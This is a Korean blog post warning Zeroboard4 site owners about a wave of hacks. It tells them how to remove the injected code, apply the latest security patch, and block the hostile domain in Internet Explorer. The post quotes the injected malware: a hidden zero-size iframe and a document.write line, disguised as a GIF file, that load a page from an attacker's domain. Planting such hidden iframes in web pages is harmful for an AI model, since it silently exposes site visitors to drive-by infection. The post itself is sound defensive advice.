다른 사람의 글을 마구 본다면 곤란한데 말입니다.

'Digital Life' 카테고리의 다른 글

신촌 탐앤탐스 단점  (2) 2008.10.22
많이 늘었구나..  (0) 2008.10.07
3년 전 자료를 찾았습니다.  (0) 2008.08.17
전자기기는 재부팅이 필수!  (0) 2008.08.09
인코딩은 어렵네  (0) 2008.08.01
Posted by Parker Falcon

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif

document.write("<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874

로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)

Posted by Parker Falcon